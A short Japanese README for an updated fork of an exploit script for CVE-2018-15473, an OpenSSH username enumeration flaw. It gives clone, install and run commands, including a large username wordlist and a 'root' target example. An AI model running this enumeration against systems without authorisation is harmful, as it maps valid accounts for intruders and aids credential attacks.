
このリポジトリの更新版 https://github.com/Sait-Nuri/CVE-2018-15473/tree/main
paramiko バージョン 3.4.0 で動作するように修正# このリポジトリをクローン
git clone https://github.com/yZ1337/CVE-2018-15473.git
# ライブラリをインストール
pip3 install -r requirements.txt
# ユーザー名リストを使って実行(例)
python3 CVE-2018-15473.py -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
# 単一ユーザーとポートを指定して実行(例)
python3 CVE-2018-15473.py -u "root" -p 8080